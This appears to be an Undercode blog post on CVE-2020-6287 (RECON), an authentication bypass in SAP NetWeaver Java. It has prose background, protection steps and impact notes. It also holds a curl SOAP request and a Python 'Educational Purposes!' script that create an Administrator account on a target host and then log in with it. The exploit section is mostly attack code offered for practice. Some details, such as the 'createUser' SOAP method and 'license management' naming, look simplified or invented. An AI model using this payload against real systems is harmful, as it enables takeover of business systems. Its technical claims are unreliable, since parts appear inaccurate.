Listen to this Post
CVE-2020-6287, also known as RECON (Remotely Exploitable Code On NetWeaver), is a critical authentication bypass vulnerability affecting the SAP NetWeaver Java stack. The flaw resides in the SAP NetWeaver Application Server Java, specifically within the `lm` (license management) component. Under default configurations, the `lm` servlet is exposed without proper authentication checks. This servlet is part of the SAP NetWeaver Java system’s administrative interface, which is typically accessible over HTTP or HTTPS. The vulnerability allows an unauthenticated remote attacker to create a new user with maximum privileges, effectively granting full administrative control over the affected SAP system. The root cause is a missing authentication mechanism for specific functions within the `lm` servlet. When a request is made to the vulnerable endpoint, the system does not validate the user’s identity or session, allowing the request to proceed as if it were from an authenticated administrator. An attacker can exploit this by sending crafted HTTP requests to the servlet, invoking methods that create a new user account. The created user is assigned the `Administrator` role, which provides unrestricted access to all SAP NetWeaver Java applications, configuration settings, and business data. Once administrative access is obtained, the attacker can perform a wide range of malicious activities, including reading sensitive information, modifying system configurations, deploying malicious applications, and disrupting business operations. The vulnerability is considered critical because it can be exploited without any prior authentication, it requires no user interaction, and it leads to complete system compromise. The CVSS v3 base score for this vulnerability is 10.0, reflecting its maximum severity. The vulnerability was discovered by Onapsis Research Labs and publicly disclosed in July 2020. Patches were released by SAP in July 2020 (SAP Security Note 2934135). Organizations running affected versions of SAP NetWeaver Java (versions 7.30, 7.31, 7.40, 7.50) are at risk. The RECON scanner tool was released by Onapsis to help organizations assess their exposure to this vulnerability. The exploit is trivial to execute, requiring only a basic HTTP request, which makes it highly attractive to attackers. Mitigations include applying the SAP patch, restricting network access to the `lm` servlet, and monitoring for suspicious user creation events. The vulnerability highlights the importance of proper authentication and authorization controls in enterprise software.
DailyCVE Form:
Platform: SAP NetWeaver Java
Version: 7.30, 7.31, 7.40, 7.50
Vulnerability : Authentication Bypass
Severity: Critical
date: July 2020
Prediction: Patched
What Undercode Say:
Check if the lm servlet is accessible curl -X POST http://target:50000/CTCWebService/CTCWebServiceBean -H "Content-Type: text/xml" -d '<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:createUser><urn:userName>attacker</urn:userName><urn:password>P@ssw0rd</urn:password><urn:roles>Administrator</urn:roles></urn:createUser></soapenv:Body></soapenv:Envelope>' Verify user creation curl -X POST http://target:50000/CTCWebService/CTCWebServiceBean -H "Content-Type: text/xml" -d '<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:getUser><urn:userName>attacker</urn:userName></urn:getUser></soapenv:Body></soapenv:Envelope>'
Exploit: (Educational Purposes!)
import requests
target = "http://192.168.1.100:50000"
endpoint = "/CTCWebService/CTCWebServiceBean"
payload = """<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
<soapenv:Header/>
<soapenv:Body>
<urn:createUser>
<urn:userName>pwned</urn:userName>
<urn:password>P@ssw0rd123</urn:password>
<urn:roles>Administrator</urn:roles>
</urn:createUser>
</soapenv:Body>
</soapenv:Envelope>"""
headers = {"Content-Type": "text/xml"}
response = requests.post(target + endpoint, data=payload, headers=headers)
print(response.status_code)
print(response.text)
Use created credentials to access admin panel
session = requests.Session()
session.auth = ("pwned", "P@ssw0rd123")
admin_page = session.get(target + "/webdynpro/resources/sap.com/tc~lm~wdy~landscape~ui~LandscapeBrowser")
print(admin_page.status_code)
Protection:
- Apply SAP Security Note 2934135 (July 2020) immediately.
- Restrict network access to the `lm` servlet and CTCWebService endpoints to trusted hosts only.
- Monitor for unexpected user creation events, especially users with Administrator roles.
- Use SAP’s RECON scanner tool to identify vulnerable systems.
- Implement network segmentation to isolate SAP NetWeaver Java systems from untrusted networks.
Impact:
Successful exploitation allows an unauthenticated attacker to create a new administrative user, leading to complete compromise of the SAP NetWeaver Java system. The attacker can read, modify, or delete sensitive business data, disrupt operations, deploy malicious code, and pivot to other connected systems. The vulnerability affects confidentiality, integrity, and availability, with a CVSS v3 base score of 10.0.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

